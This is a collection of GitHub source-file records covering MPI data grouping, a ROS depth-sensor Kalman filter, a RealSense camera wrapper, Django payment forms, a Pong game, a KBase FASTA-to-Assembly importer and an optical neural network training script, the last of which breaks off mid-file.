+{"seq_id":"16509892528","text":"from mpi4py import MPI\nimport pandas as pd\n\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\nsize = comm.Get_size()\n\ndf = pd.read_csv('../dataset/datos.csv', delimiter = ';', encoding = 'ISO-8859-1')\ndf.head()\n\ndef reduce(num):\n dfR = df.filter(items = [df.columns[num]])\n dfGrouped = dfR.groupby([dfR.columns[0]]).size()\n print(dfGrouped)\n print(\"#####################################\")\n\nif rank == 0:\n comm.send(1, dest = 1) # ciudad\n comm.send(5, dest = 2) # clase\n comm.send(4, dest = 3) # dia\n comm.send(7, dest = 4) # gravedad\n\nif rank == 1:\n num = comm.recv(source = 0)\n reduce(num)\n\nif rank == 2:\n num = comm.recv(source = 0)\n reduce(num)\n\nif rank == 3:\n num = comm.recv(source = 0)\n reduce(num)\n\nif rank == 4:\n num = comm.recv(source = 0)\n reduce(num)\n","repo_name":"sortizs/pr4-hpc","sub_path":"mpi/mpi_acc.py","file_name":"mpi_acc.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"74267207526","text":"__author__ = 'Bartek'\nfrom .indor_exceptions import ClassPropertyNotFound\nfrom .xml_tree_factory import XmlTreeFactory\nfrom .xml_tree import XmlTree\n\n\nclass XmlTreeRegister(type(XmlTree)):\n def __init__(cls, name, bases, dic):\n cls.property_name_for_printer = 'pretty_name'\n if cls.property_name_for_printer not in dic:\n raise ClassPropertyNotFound(name, cls.property_name_for_printer)\n super(XmlTreeRegister, cls).__init__(name, bases, dic)\n XmlTreeFactory().add_class(name, cls)\n","repo_name":"nokia-wroclaw/innovativeproject-resttest","sub_path":"src/indor/xml_tree_register.py","file_name":"xml_tree_register.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"42324065845","text":"#!/usr/bin/env python3\n\nimport ms5837_driver\nimport rospy\nimport time\nfrom geometry_msgs.msg import PoseWithCovarianceStamped\nfrom ms5837.msg import ms5837_data\nfrom nav_msgs.msg import Odometry\nimport numpy as np\n\n\n# Choose seawater or freshwater depth calibration using ros param\n# freshwater = 997 kg/m^3\n# seawater = 1029 kg/m^3\n\n# def calculate(array):\n# mean = 0\n# #total = 0\n# if(len(array)>50):\n# array.pop(0)\n# mean = sum(array)\n# mean /= len(array)\n# #for point in array:\n # total += (point - mean) * (point - mean)\n #total /= len(array)\n #print(mean)\n #return mean\n\nclass KalmanFilter:\n\n def __init__(self, max_diff=100, process_noise_matrix=np.array([[0.001, 0.00000001, 0.00000001], [0.00000001, 0.0005, 0.00000001], [0.00000001, 0.00000001, 0.0001]])):\n # initialize the filter with random values\n self.KG = np.ones((3, 3)) # Kalman gain\n self.est = np.zeros((3, 3)) # last estimate (x,v,a)\n self.est_error = np.ones((3, 3)) # Error of the filter estimate\n self.process_noise_matrix = process_noise_matrix\n\n self.last_time = time.time() # for calculating dt\n\n # for sanity check on sensor value\n self.last_x_m = None\n self.max_diff = max_diff # the maximum error between two sensor readings for value to be thrown out\n\n def update(self, x_m, v_m, a_m, x_e, v_e, a_e):\n # pass in measure position, velocity, and acceleration along with error for each\n # check to make sure sensor value has not had catastrophic problem\n if self.last_x_m is None:\n self.last_x_m = x_m\n if abs(x_m - self.last_x_m) > self.max_diff:\n rospy.logerr(\"Sensor value error: change in measurement too large for one time step\")\n else:\n\n # if value is all good then continue to run time step step\n current_time = time.time()\n dt = current_time - self.last_time\n self.last_time = current_time\n\n # create our new estimate based on the model\n self.est = np.matmul(np.array([[1, dt, 1 / 2.0 * dt ** 2], [0, 1, dt], [0, 0, 1]]), self.est) * [[1, 0, 0], [0, 1, 0], [0, 0, 1]]\n rospy.logdebug(self.est)\n self.est_error = self.est_error * [[1, 0, 0], [0, 1, 0], [0, 0, 1]] + self.process_noise_matrix # prevent error from going to zero\n rospy.logdebug(self.est_error)\n\n # update estimate with new sensor values\n self.KG = self.est_error / (self.est_error + np.array([[x_e, 0, 0], [0, v_e, 0], [0, 0, a_e]])) * [[1, 0, 0], [0, 1, 0], [0, 0, 1]]\n self.est = self.est + np.matmul(self.KG, np.array([[x_m, 0, 0], [0, v_m, 0], [0, 0, a_m]]) - self.est)\n self.est_error = np.matmul((np.identity(3) - self.KG), self.est_error)\n\n self.last_x_m = x_m\n return self.est, self.est_error\n\n\nif __name__ == '__main__':\n try:\n # set up ros stuff\n data = []\n rospy.init_node('ms5837_node')\n fluid_density = rospy.get_param('~fluid_density', '1000')\n publish_odom = rospy.get_param('~publish_odom', True)\n publish_pose = rospy.get_param('~publish_pose', False)\n use_kalman_filter = rospy.get_param('~use_kalman_filter', False)\n depth_variance = rospy.get_param('~depth_variance', 0.001)\n tf_frame = rospy.get_param(\"~tf_frame\", \"depth_sensor_link\")\n\n pub = rospy.Publisher('rov/ms5837', ms5837_data, queue_size=1)\n rate = rospy.Rate(20) # 100Hz data read\n sensor = ms5837_driver.MS5837_02BA(bus=1) # Default I2C bus is 1 (Raspberry Pi 3)\n # sensor = ms5837.MS5837_02BA()\n\n sensor.setFluidDensity(int(fluid_density))\n time.sleep(1)\n # sensor.init must run immediately after installation of ms5837 object\n sensor.init()\n\n odom_pub = None\n pose_pub = None\n filter 
= None\n if publish_odom:\n odom_pub = rospy.Publisher(\"/rov/depth_odom\", Odometry, queue_size=1)\n if publish_pose:\n pose_pub = rospy.Publisher(\"/rov/depth_pose\", PoseWithCovarianceStamped, queue_size=1)\n if use_kalman_filter:\n filter = KalmanFilter(100)\n\n last_depth_m = 0 # the last sensor value for computing the velocity\n last_velocity_m = 0 # last velocity for computing acceleration\n last_time = time.time() # time of last read for computing velocity\n\n while not rospy.is_shutdown():\n msg = ms5837_data()\n\n sensor.read(oversampling=0) # maximum read rate of ~90Hz\n\n current_time = time.time()\n dt = current_time - last_time\n last_time = current_time\n\n # measured values for depth, velocity, acceleration\n velocity_m = (sensor.depth() - last_depth_m) / dt\n last_depth_m = sensor.depth()\n acceleration_m = (velocity_m - last_velocity_m) / dt\n last_velocity_m = velocity_m\n\n if use_kalman_filter:\n state, variance = filter.update(sensor.depth(), velocity_m, acceleration_m,\n depth_variance, depth_variance, depth_variance)\n depth = state[0, 0]\n velocity = state[1, 1]\n variance = [variance[0, 0], variance[1, 1]] # position and velocity variance\n else:\n depth = sensor.depth()\n\n velocity = velocity_m\n variance = [depth_variance, depth_variance]\n\n msg.tempC = sensor.temperature(ms5837_driver.UNITS_Centigrade)\n msg.tempF = sensor.temperature(ms5837_driver.UNITS_Farenheit)\n msg.depth = sensor.depth()\n # msg.altitudeM = sensor.altitude() # causes error in driver\n\n # update message headers\n msg.header.stamp = rospy.Time.now()\n msg.header.frame_id = 'depth_data'\n\n pub.publish(msg)\n\n if publish_odom:\n msg = Odometry()\n msg.header.frame_id = tf_frame\n msg.header.stamp = rospy.Time.now()\n msg.pose.pose.position.z = float(depth)\n data.append(depth)\n # if(len(data) >= 50):\n # msg.pose.pose.position.z = float(calculate(data))\n time_now = time.time()\n msg.twist.twist.linear.z = float(velocity)\n last_time = time_now\n msg.pose.covariance[14] = variance[0]\n msg.twist.covariance[14] = variance[1]\n odom_pub.publish(msg)\n\n if publish_pose:\n msg = PoseWithCovarianceStamped()\n msg.header.frame_id = tf_frame\n msg.header.stamp = rospy.Time.now()\n msg.pose.pose.position.z = 1#sensor.depth() #(float(depth) - 193)\n msg.pose.covariance[14] = variance[0]\n pose_pub.publish(msg)\n\n rate.sleep()\n\n except rospy.ROSInterruptException:\n pass\n","repo_name":"MUsurf/Jelly_ROS_22-23","sub_path":"catkin_ws/src/ms5837/src/ms5837_ros.py","file_name":"ms5837_ros.py","file_ext":"py","file_size_in_byte":7022,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
+{"seq_id":"1477214775","text":"import pyrealsense2 as rs\nimport numpy as np\nimport cv2\n\n\nclass Realsense_Module():\n WIDTH = 640\n HEIGHT = 480\n FPS = 30\n def __init__(self,device = \"218622271154\") :\n #RGBとdepthの初期設定\n self.conf = rs.config()\n self.conf.enable_device(device)\n #解像度はいくつか選択できる\n self.conf.enable_stream(rs.stream.color, self.WIDTH, self.HEIGHT, rs.format.bgr8, self.FPS)\n self.conf.enable_stream(rs.stream.depth, self.WIDTH, self.HEIGHT, rs.format.z16, self.FPS)\n #stream開始\n self.pipe = rs.pipeline()\n self.profile = self.pipe.start(self.conf)\n #Alignオブジェクト生成(位置合わせのオブジェクト)\n self.align_to = rs.stream.color\n self.align = rs.align(self.align_to)\n #カメラ情報の取得(内パラ)\n self.depth_intrinsics = rs.video_stream_profile(self.profile.get_stream(rs.stream.depth)).get_intrinsics()\n self.color_intrinsics = rs.video_stream_profile(self.profile.get_stream(rs.stream.color)).get_intrinsics()\n\n def obtain_camera_prame(self):\n R=[self.color_intrinsics.fx,\n self.color_intrinsics.fy,\n self.WIDTH/2,\n self.HEIGHT/2\n ]\n return R\n\n def obtain_cam_image(self) :\n try :\n #フレーム待ち(これがないとデータの取得にエラーが出ることがあるらしい)\n frames = self.pipe.wait_for_frames()\n # get_frame_data\n aligned_frames = self.align.process(frames)\n color_frame = aligned_frames.get_color_frame()\n depth_frame = aligned_frames.get_depth_frame()\n depth_frame = self.depth_filter(depth_frame)\n if not depth_frame or not color_frame:\n return\n #dataがunit16の形で入っているのでnumpy配列に変更\n color_image = np.asanyarray(color_frame.get_data())\n depth_image = np.asanyarray(depth_frame.get_data())\n img_flag=True\n return color_image,depth_image,depth_frame,img_flag\n except Exception as e :\n print(e)\n color_image=None\n depth_image=None\n depth_frame=None\n img_flag=False\n return color_image,depth_image,depth_frame,img_flag\n\n def obtain_point(self,result_frame,box_result) :\n result_pos=[]\n for u_v in box_result :\n u = int(u_v[0])\n v = int(u_v[1])\n #3次元座標推定\n i_d = result_frame.get_distance(u,v) #距離推定\n point = rs.rs2_deproject_pixel_to_point(self.color_intrinsics , [u,v], i_d) #カメラ座標のx,y取得\n result_pos.append(point)\n return result_pos\n \n def depth_filter(self,depth_frame):\n #TODO recursive median filterを入れる\n # decimarion_filterのパラメータ\n decimate = rs.decimation_filter()\n decimate.set_option(rs.option.filter_magnitude, 1)\n # spatial_filterのパラメータ\n spatial = rs.spatial_filter()\n spatial.set_option(rs.option.filter_magnitude, 1)\n spatial.set_option(rs.option.filter_smooth_alpha, 0.25)\n spatial.set_option(rs.option.filter_smooth_delta, 50)\n # hole_filling_filterのパラメータ\n hole_filling = rs.hole_filling_filter()\n # disparity\n depth_to_disparity = rs.disparity_transform(True)\n disparity_to_depth = rs.disparity_transform(False)\n # filterをかける\n filter_frame = decimate.process(depth_frame)\n filter_frame = depth_to_disparity.process(filter_frame)\n filter_frame = spatial.process(filter_frame)\n filter_frame = disparity_to_depth.process(filter_frame)\n filter_frame = hole_filling.process(filter_frame)\n result_frame = filter_frame.as_depth_frame()\n return result_frame\n\n def limit_area(self,color_image,depth_image,left=0,right=600,top=0,bottom=500):\n lim_colorimage=color_image[left:right,top:bottom,:]\n lim_depth_image=depth_image[left:right,top:bottom]\n return lim_colorimage,lim_depth_image\n\n def shutdown(self):\n 
self.pipe.stop()\n\n\n","repo_name":"Hibikino-Toms-Robot/image_process","sub_path":"image_node/realsense_setup.py","file_name":"realsense_setup.py","file_ext":"py","file_size_in_byte":4230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"31698708414","text":"from django import forms\nfrom django.contrib.auth import get_user_model\nfrom projects.models import Project\nfrom payments.models import Payments\nUser = get_user_model()\n\n# pay project based form\nclass PaymentsProjectForm(forms.ModelForm):\n receivers = forms.ModelMultipleChoiceField(\n queryset=User.objects.filter(user_type='worker'),\n widget=forms.CheckboxSelectMultiple\n )\n class Meta:\n model = Payments\n fields = [\n 'amount',\n 'per_entry',\n 'receivers',\n ]\n widgets = {\n 'amount': forms.NumberInput(attrs={'class': 'form-control'}), \n 'per_entry': forms.NumberInput(attrs={'class': 'form-control'}), \n }\n\n\n# pay to direct worker form\nclass PaymentWorkerForm(forms.ModelForm):\n receivers = forms.ModelMultipleChoiceField(\n queryset=User.objects.filter(user_type='worker'),\n widget=forms.CheckboxSelectMultiple\n )\n\n class Meta:\n model = Payments\n fields = [\n 'project',\n 'amount',\n 'per_entry',\n 'receivers',\n ]\n widgets = {\n 'project': forms.Select(attrs={'class': 'form-control'}), \n 'amount': forms.NumberInput(attrs={'class': 'form-control'}), \n 'per_entry': forms.NumberInput(attrs={'class': 'form-control'}), \n }\n","repo_name":"alfinarif/project-management-application","sub_path":"payments/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"70817389927","text":"from turtle import Screen\nfrom paddle import Paddle\nfrom ball import Ball\nfrom scoreboard import Scoreboard\nimport time\n\nscreen = Screen()\nscreen.bgcolor(\"#191919\")\nscreen.setup(width=800, height=600)\nscreen.title(\"PyPong\")\nscreen.tracer(0)\n\nr_paddle = Paddle((350, 0))\nl_paddle = Paddle((-350, 0))\nball = Ball()\nscoreboard = Scoreboard()\n\nscreen.listen()\nscreen.onkey(r_paddle.move_up, \"Up\")\nscreen.onkey(r_paddle.move_down, \"Down\")\nscreen.onkey(l_paddle.move_up, \"w\")\nscreen.onkey(l_paddle.move_down, \"s\")\n\ngame_on = True\nwhile game_on:\n time.sleep(ball.move_speed)\n screen.update()\n ball.move()\n # Collision with top and bottom walls\n if ball.ycor() > 280 or ball.ycor() < -280:\n ball.bounce_y()\n # Collision with paddles\n if ball.distance(r_paddle) < 50 and ball.xcor() > 320 or ball.distance(l_paddle) < 50 and ball.xcor() < -320:\n ball.bounce_x()\n # detect misses\n # right player\n if ball.xcor() > 380:\n ball.reset_position()\n scoreboard.l_point()\n\n # left player\n if ball.xcor() < -380:\n ball.reset_position()\n scoreboard.r_point()\n\nscreen.exitonclick()\n","repo_name":"cmlohr/py-pong","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"8163196434","text":"import json\nimport os\nimport os.path\nfrom pathlib import Path\nimport sys\nimport uuid\nfrom typing import List, Callable\nfrom collections import Counter\nfrom hashlib import md5\n\nfrom Bio import SeqIO\n\nfrom installed_clients.DataFileUtilClient import DataFileUtil\n\n\n_WSID = 'workspace_id'\n_MCL = 'min_contig_length'\n_INPUTS = 'inputs'\n_FILE = 'file'\n_NODE = 'node'\n_ASSEMBLY_NAME = 'assembly_name'\n\n\ndef _upa(object_info):\n return f'{object_info[6]}/{object_info[0]}/{object_info[4]}'\n\nclass FastaToAssembly:\n\n # Note added X due to kb|g.1886.fasta\n _VALID_CHARS = \"-ACGTUWSMKRYBDHVNX\"\n _AMINO_ACID_SPECIFIC_CHARACTERS = \"PLIFQE\"\n def __init__(self,\n dfu: DataFileUtil,\n scratch: Path,\n uuid_gen: Callable[[], uuid.UUID] = lambda: uuid.uuid4()):\n self._scratch = scratch\n self._dfu = dfu\n self._uuid_gen = uuid_gen\n\n def import_fasta(self, params):\n print('validating parameters')\n mass_params = self._set_up_single_params(params)\n return self._import_fasta_mass(mass_params)[0]\n\n def import_fasta_mass(self, params):\n print('validating parameters')\n self._validate_mass_params(params)\n return self._import_fasta_mass(params)\n\n def _import_fasta_mass(self, params):\n # For now this is completely serial, but theoretically we could start uploading\n # Blobstore nodes when some fraction of the initial checks are done, start uploading\n # Workspace obects when some fraction of the Blobstore nodes are done, parallelize\n # the file filtering / parsing, etc.\n # For now keep it simple\n # Also note all the assembly data is kept in memory once parsed, but it contains\n # no sequence info and so shouldn't be too huge. Could push to KBase in batches or\n # save to disk if that's an issue\n # We also probably want to add some retries for saving data, but that should go\n # in DataFileUtils if it's not there already\n # Finally, if more than 1G worth of assembly object data is sent to the workspace at once,\n # the call will fail. May need to add some checking / splitting code around this.\n if _FILE in params[_INPUTS][0]:\n input_files = self._stage_file_inputs(params[_INPUTS])\n else:\n input_files = self._stage_blobstore_inputs(params[_INPUTS])\n\n mcl = params.get(_MCL)\n assembly_data = []\n output = []\n for i in range(len(input_files)):\n # Hmm, all through these printouts we should really put the blobstore node here as\n # well as the file if it exists... 
wait and see if that code path is still actually\n # used\n if mcl:\n print(f'filtering FASTA file {input_files[i]} by contig length '\n + f'(min len={mcl} bp)')\n input_files[i] = self._filter_contigs_by_length(input_files[i], mcl)\n output.append({'filtered_input': str(input_files[i]) if mcl else None})\n print(f'parsing FASTA file: {input_files[i]}')\n assdata = self._parse_fasta(\n input_files[i],\n params[_INPUTS][i].get('contig_info') or {})\n print(f' - parsed {assdata[\"num_contigs\"]} contigs, {assdata[\"dna_size\"]} bp')\n if not assdata[\"num_contigs\"]:\n raise ValueError(\"Either the original FASTA file contained no sequences or they \"\n + \"were all filtered out based on the min_contig_length \"\n + f\"parameter for file {input_files[i]}\")\n assembly_data.append(assdata)\n\n print('saving assemblies to KBase')\n file_handles = self._save_files_to_blobstore(input_files)\n assobjects = []\n for assdata, file_handle, inputs, sourcefile in zip(\n assembly_data, file_handles, params[_INPUTS], input_files):\n ao = self._build_assembly_object(assdata, file_handle, inputs)\n assobjects.append(ao)\n # this appears to be completely unused\n with open(sourcefile.parent / \"example.json\", \"w\") as f:\n json.dump(ao, f)\n\n # save to WS and return\n assembly_infos = self._save_assembly_objects(\n params[_WSID],\n [p[_ASSEMBLY_NAME] for p in params[_INPUTS]],\n assobjects\n )\n for out, ai in zip(output, assembly_infos):\n out['upa'] = _upa(ai)\n return output\n\n def _build_assembly_object(self, assembly_data, fasta_file_handle_info, params):\n \"\"\" construct the WS object data to save based on the parsed info and params \"\"\"\n assembly_data['assembly_id'] = params[_ASSEMBLY_NAME]\n assembly_data['fasta_handle_ref'] = fasta_file_handle_info['handle']['hid']\n assembly_data['fasta_handle_info'] = fasta_file_handle_info\n\n assembly_data['type'] = 'Unknown'\n if 'type' in params:\n assembly_data['type'] = params['type']\n\n if 'external_source' in params:\n assembly_data['external_source'] = params['external_source']\n\n if 'external_source_id' in params:\n assembly_data['external_source_id'] = params['external_source_id']\n\n if 'external_source_origination_date' in params:\n # TODO this is an arbitrary string, which isn't useful. If this field is actually\n # used, make a new field with a standard timestamp format (epoch date?), validate that\n # format, and deprecate this field\n assembly_data['external_source_origination_date'] = params['external_source_origination_date']\n\n return assembly_data\n\n def _parse_fasta(self, fasta_file_path: Path, extra_contig_info):\n \"\"\" Do the actual work of inspecting each contig \"\"\"\n\n # TODO TEST this needs more extensive unit testing\n # variables to store running counts of things\n total_length = 0\n base_counts = {'A': 0, 'G': 0, 'C': 0, 'T': 0}\n md5_list = []\n\n # map from contig_id to contig_info\n all_contig_data = {}\n\n for record in SeqIO.parse(str(fasta_file_path), \"fasta\"):\n # SeqRecord(seq=Seq('TTAT...', SingleLetterAlphabet()),\n # id='gi|113968346|ref|NC_008321.1|',\n # name='gi|113968346|ref|NC_008321.1|',\n # description='gi|113968346|ref|NC_008321.1| Shewanella sp. 
MR-4 chromosome, complete genome',\n # dbxrefs=[])\n\n sequence = str(record.seq).upper()\n\n contig_info = {\n 'contig_id': record.id,\n 'name': record.id,\n 'description': record.description[len(record.id):].strip(),\n 'length': len(record.seq)\n }\n\n # 1) compute sequence character statistics running total\n total_length += contig_info['length']\n sequence_count_table = dict(Counter(sequence))\n for character in sequence_count_table:\n if character in base_counts:\n base_counts[character] = base_counts[character] + sequence_count_table[character]\n else:\n base_counts[character] = sequence_count_table[character]\n if character not in self._VALID_CHARS:\n if character in self._AMINO_ACID_SPECIFIC_CHARACTERS:\n raise ValueError('This FASTA file may have amino acids in it instead '\n 'of the required nucleotides.')\n raise ValueError(f\"This FASTA file has non nucleic acid characters: \"\n f\"{character}\")\n\n # 2) record number of 'N' characters (only set if there are some)\n Ncount = 0\n if 'N' in sequence_count_table:\n Ncount = sequence_count_table['N']\n contig_info['Ncount'] = Ncount\n\n # 2b) record if the contig is circular\n # TODO should throw an error if ECI has invalid record IDs\n if record.id in extra_contig_info:\n if 'is_circ' in extra_contig_info[record.id]:\n # TODO supposed to be a boolean, should check for 1 or 0\n contig_info['is_circ'] = int(extra_contig_info[record.id]['is_circ'])\n if 'description' in extra_contig_info[record.id]:\n contig_info['description'] = str(extra_contig_info[record.id]['description'])\n\n # 3) record md5 checksum\n contig_md5 = md5(sequence.encode()).hexdigest()\n contig_info['md5'] = contig_md5\n md5_list.append(contig_md5)\n\n # 4) record the all important GC to ~3 significant digits\n GC_count = 0\n for base in ['G', 'C']:\n if base in sequence_count_table:\n GC_count += sequence_count_table[base]\n contig_info['gc_content'] = round(float(GC_count) / float(contig_info['length']), 5)\n\n # 5) add to contig list\n if contig_info['contig_id'] in all_contig_data:\n raise ValueError('The FASTA header key ' + contig_info['contig_id'] +\n 'appears more than once in the file')\n\n all_contig_data[contig_info['contig_id']] = contig_info\n\n # Aggregate stats for the data\n total_gc_content = None\n if total_length > 0:\n total_gc_content = round(float(base_counts['G'] + base_counts['C']) / float(total_length), 5)\n assembly_data = {\n 'md5': md5(\",\".join(sorted(md5_list)).encode()).hexdigest(),\n 'base_counts': base_counts,\n 'dna_size': total_length,\n 'gc_content': total_gc_content,\n 'contigs': all_contig_data,\n 'num_contigs': len(all_contig_data)\n }\n return assembly_data\n\n @staticmethod\n def _fasta_filter_contigs_generator(fasta_record_iter, min_contig_length):\n \"\"\" generates SeqRecords iterator for writing from a legacy contigset object \"\"\"\n rows = 0\n rows_added = 0\n for record in fasta_record_iter:\n rows += 1\n if len(record.seq) >= min_contig_length:\n rows_added += 1\n yield record\n print(f' - filtered out {rows - rows_added} of {rows} contigs that were shorter '\n f'than {(min_contig_length)} bp.')\n\n def _filter_contigs_by_length(self, fasta_file_path: Path, min_contig_length) -> Path:\n \"\"\" removes all contigs less than the min_contig_length provided \"\"\"\n filtered_fasta_file_path = Path(str(fasta_file_path) + '.filtered.fa')\n\n fasta_record_iter = SeqIO.parse(str(fasta_file_path), 'fasta')\n SeqIO.write(self._fasta_filter_contigs_generator(fasta_record_iter, min_contig_length),\n 
str(filtered_fasta_file_path), 'fasta')\n\n return filtered_fasta_file_path\n\n def _save_assembly_objects(self, workspace_id, assembly_names, ass_data):\n print('Saving Assemblies to Workspace')\n sys.stdout.flush()\n ws_inputs = []\n for assname, assdata_singular in zip(assembly_names, ass_data):\n ws_inputs.append({\n 'type': 'KBaseGenomeAnnotations.Assembly', # This should really be versioned...\n 'data': assdata_singular,\n 'name': assname\n })\n return self._dfu.save_objects({'id': workspace_id, 'objects': ws_inputs})\n\n def _save_files_to_blobstore(self, files: List[Path]):\n print(f'Uploading FASTA files to the Blobstore')\n sys.stdout.flush()\n blob_input = [{'file_path': str(fp), 'make_handle': 1} for fp in files]\n return self._dfu.file_to_shock_mass(blob_input)\n\n def _stage_file_inputs(self, inputs) -> List[Path]:\n in_files = []\n for inp in inputs:\n if not os.path.isfile(inp[_FILE]):\n raise ValueError(\n \"KBase Assembly Utils tried to save an assembly, but the calling \"\n + f\"application specified a file ('{inp[_FILE]}') that is missing. \"\n + \"Please check the application logs for details.\")\n # Ideally we'd have some sort of security check here but the DTN files could\n # be mounted anywhere...\n # TODO check with sysadmin about this - checked, waiting on clear list of safedirs\n fp = Path(inp[_FILE]).resolve(strict=True)\n # make the downstream unpack call unpack into scratch rather than wherever the\n # source file might be\n file_path = self._create_temp_dir() / fp.name\n # symlink doesn't work, because in DFU filemagic doesn't follow symlinks, and so\n # DFU won't unpack symlinked files\n os.link(fp, file_path)\n in_files.append(file_path)\n # extract the file if it is compressed\n # could add a target dir argument to unpack_files, not sure how much work that might be\n fs = [{'file_path': str(fp), 'unpack': 'uncompress'} for fp in in_files]\n unpacked_files = self._dfu.unpack_files(fs)\n return [Path(uf['file_path']) for uf in unpacked_files]\n\n def _stage_blobstore_inputs(self, inputs) -> List[Path]:\n blob_params = []\n for inp in inputs:\n blob_params.append({\n 'shock_id': inp[_NODE],\n 'file_path': str(self._create_temp_dir()),\n 'unpack': 'uncompress' # Will throw an error for archives\n })\n dfu_res = self._dfu.shock_to_file_mass(blob_params)\n return [Path(dr['file_path']) for dr in dfu_res]\n\n def _create_temp_dir(self):\n tmpdir = self._scratch / (\"import_fasta_\" + str(self._uuid_gen()))\n os.makedirs(tmpdir, exist_ok=True)\n return tmpdir\n\n def _set_up_single_params(self, params):\n inputs = dict(params)\n ws_id = self._get_int(inputs.pop(_WSID, None), _WSID)\n ws_name = inputs.pop('workspace_name', None)\n if (bool(ws_id) == bool(ws_name)): # xnor\n raise ValueError(f\"Exactly one of a {_WSID} or a workspace_name must be provided\")\n if not ws_id:\n print(f\"Translating workspace name {ws_name} to a workspace ID. 
Prefer submitting \"\n + \"a workspace ID over a mutable workspace name that may cause race conditions\")\n ws_id = self._dfu.ws_name_to_id(params['workspace_name'])\n\n if not inputs.get(_ASSEMBLY_NAME):\n raise ValueError(f\"Required parameter {_ASSEMBLY_NAME} was not defined\")\n\n # one and only one of either 'file' or 'shock_id' is required\n file_ = inputs.pop(_FILE, None)\n shock_id = inputs.pop('shock_id', None)\n if (bool(file_) == bool(shock_id)): # xnor\n raise ValueError(f\"Exactly one of {_FILE} or shock_id is required\")\n if file_:\n if not isinstance(file_, dict) or 'path' not in file_:\n raise ValueError('When specifying a FASTA file input, \"path\" field was '\n + f'not defined in \"{_FILE}\"')\n mass_params = {\n _WSID: ws_id,\n # Ideally set of minimum of 2 here, but left at 1 for backwards compatibility\n _MCL: self._get_int(inputs.pop(_MCL, None), f\"If provided, {_MCL}\"),\n _INPUTS: [inputs]\n }\n if file_:\n inputs[_FILE] = params[_FILE]['path']\n else:\n inputs[_NODE] = params['shock_id']\n return mass_params\n\n def _validate_mass_params(self, params):\n ws_id = self._get_int(params.get(_WSID), _WSID)\n if not ws_id:\n raise ValueError(f\"{_WSID} is required\")\n inputs = params.get(_INPUTS)\n if not inputs or type(inputs) != list:\n raise ValueError(f\"{_INPUTS} field is required and must be a non-empty list\")\n for i, inp in enumerate(inputs, start=1):\n if type(inp) != dict:\n raise ValueError(f\"Entry #{i} in {_INPUTS} field is not a mapping as required\")\n file_ = inputs[0].get(_FILE)\n if bool(file_) == bool(inputs[0].get(_NODE)): # xnor\n raise ValueError(f\"Entry #1 in {_INPUTS} field must have exactly one of \"\n + f\"{_FILE} or {_NODE} specified\")\n field = _FILE if file_ else _NODE\n for i, inp in enumerate(inputs, start=1):\n if not inp.get(field):\n raise ValueError(\n f\"Entry #{i} in {_INPUTS} must have a {field} field to match entry #1\")\n if not inp.get(_ASSEMBLY_NAME):\n raise ValueError(f\"Missing {_ASSEMBLY_NAME} field in {_INPUTS} entry #{i}\")\n self._get_int(params.get(_MCL), f\"If provided, {_MCL}\", minimum=2)\n\n def _get_int(self, putative_int, name, minimum=1):\n if putative_int is not None:\n if type(putative_int) != int:\n raise ValueError(f\"{name} must be an integer, got: {putative_int}\")\n if putative_int < minimum:\n raise ValueError(f\"{name} must be an integer >= {minimum}\")\n return putative_int\n","repo_name":"kbaseapps/AssemblyUtil","sub_path":"lib/AssemblyUtil/FastaToAssembly.py","file_name":"FastaToAssembly.py","file_ext":"py","file_size_in_byte":17197,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"4536169800","text":"'''\nThis file contains functionalities for training and loading the various models that were designed in this project.\nBased on the codebase at https://github.com/mike-fang/imprecise_optical_neural_network. The majority of the file is my own code.\n\n@version 3.8.2021\n'''\n\n\nimport numpy as np\nprint(1)\nimport torch as th\nprint(2)\nimport matplotlib.pylab as plt\nprint(3)\nfrom optical_nn import *\nprint(4)\nimport complex_torch_var as ct\nprint(5)\nfrom mnist import *\nprint(6)\nimport os\nprint(7)\nfrom time import time\nprint(8)\nfrom functools import partial\nprint(9)\nfrom glob import glob\nprint(10)\nfrom default_params import *\nprint(11)\nfrom torch.utils.tensorboard import SummaryWriter\n\nwriter = SummaryWriter('runs/QONN')\nprint(\"writer created\")\n\n\nDIR_PATH = os.path.dirname(os.path.realpath(__file__))\n\n# Good learning rates for different networks\nLR_FFT = 5e-2\nLR_GRID = 2.5e-4\nLR_COMPLEX = 5e-3\n\n'''\nTrain networks based on ComplexNet for 10 epochs.\n\nInputs:\n f: location to save the network\n n_h: # of hidden units\n'''\ndef train_complex(f=F_COMPLEX_TRAIN, n_h=[256, 256]):\n\n # Define training parameters\n train_params = {}\n train_params['n_epochs'] = 5\n train_params['log_interval'] = 10\n train_params['batch_size'] = 100\n\n # Define optimization parameters\n optim_params = {}\n optim_params['lr'] = 1.0e-3\n optim_params['momentum'] = .9\n\n # Create model\n net = mnist_complex(hidden_units=n_h)\n print(net)\n\n # Train for 10 epochs, slashing learning rate after 5\n train(net, **train_params, optim_params=optim_params, writer=writer)\n optim_params['lr'] /= 5\n\n train(net, **train_params, optim_params=optim_params, writer=writer, iteration = 1)\n acc = get_acc(net)\n\n print(f'Trained ComplexNet with accuracy {acc}.')\n writer.close()\n # Save model\n if f:\n th.save(net.state_dict(), f)\n print(f'Saved model to {f}.')\n\n'''\nTrain networks based on a modified GridNet for 10 epochs.\n\nInputs:\n f: location to save the network\n n_h: # of hidden units\n'''\ndef train_cgrd(f=F_CGRD_TRAIN):\n\n # Define training parameters\n train_params = {}\n train_params['n_epochs'] = 5\n train_params['log_interval'] = 100\n train_params['batch_size'] = 100\n\n # Define optimization parameters\n optim_params = {}\n optim_params['lr'] = LR_GRID\n optim_params['momentum'] = .9\n\n # Create model\n net = mnist_ONN(unitary=CGRDUnitary)\n\n # Train for 10 epochs, slashing 